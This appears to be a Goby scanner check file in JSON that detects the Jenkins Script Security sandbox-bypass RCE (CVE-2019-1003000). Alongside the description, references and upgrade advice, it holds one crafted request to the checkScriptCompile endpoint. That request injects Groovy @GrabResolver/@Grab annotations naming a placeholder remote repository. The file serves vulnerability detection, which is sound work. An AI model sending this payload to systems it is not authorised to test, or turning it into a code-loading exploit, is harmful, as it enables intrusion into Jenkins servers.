mirror of https://github.com/qwqdanchun/Goby.git
61 lines
2.7 KiB
JSON
61 lines
2.7 KiB
JSON
{
|
|
"Name": "Jenkins Script Security and Pipeline RCE(CVE-2019-1003000)",
|
|
"Description": "A sandbox bypass vulnerability exists in Script Security Plugin 1.49 and earlier in src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java that allows attackers with the ability to provide sandboxed scripts to execute arbitrary code on the Jenkins master JVM.",
|
|
"Product": "Jenkins",
|
|
"Homepage": "https://jenkins.io/",
|
|
"DisclosureDate": "2019-01-28",
|
|
"Author": "LubyRuffy",
|
|
"FofaQuery": "app=\"Jenkins\"",
|
|
"GobyQuery": "",
|
|
"Level": "3",
|
|
"Impact": "This allowed users with Overall/Read permission, or able to control Jenkinsfile or sandboxed Pipeline shared library contents in SCM, to bypass the sandbox protection and execute arbitrary code on the Jenkins master.",
|
|
"Recommendation": "- Pipeline: Declarative Plugin should be updated to version 1.3.4.1\n- Pipeline: Groovy Plugin should be updated to version 2.61.1\n- Script Security Plugin should be updated to version 1.50",
|
|
"References": [
|
|
"http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html",
|
|
"https://github.com/orangetw/awesome-jenkins-rce-2019",
|
|
"https://nvd.nist.gov/vuln/detail/CVE-2019-1003000",
|
|
"https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266",
|
|
"http://packetstormsecurity.com/files/152132/Jenkins-ACL-Bypass-Metaprogramming-Remote-Code-Execution.html",
|
|
"http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming",
|
|
"https://access.redhat.com/errata/RHBA-2019:0326",
|
|
"https://access.redhat.com/errata/RHBA-2019:0327",
|
|
"https://www.exploit-db.com/exploits/46453/",
|
|
"https://www.exploit-db.com/exploits/46572/",
|
|
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003000"
|
|
],
|
|
"HasExp": false,
|
|
"ExpParams": null,
|
|
"ExpTips": {
|
|
"Type": "",
|
|
"Content": ""
|
|
},
|
|
"ScanSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"header": {},
|
|
"method": "GET",
|
|
"uri": "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://nevercouldexists%27)%0a@Grab(group=%27package%27,%20module=%27onlyforgobytest%27,%20version=%271%27)%0aimport%20Payload;"
|
|
},
|
|
"ResponseTest": {
|
|
"checks": [
|
|
{
|
|
"operation": "contains",
|
|
"type": "item",
|
|
"value": "package#onlyforgobytest",
|
|
"variable": "$body"
|
|
}
|
|
],
|
|
"operation": "AND",
|
|
"type": "group"
|
|
}
|
|
}
|
|
],
|
|
"Tags": [
|
|
"rce"
|
|
],
|
|
"CVEIDs": [
|
|
"CVE-2019-1003000"
|
|
],
|
|
"CVSSScore": "8.8"
|
|
} |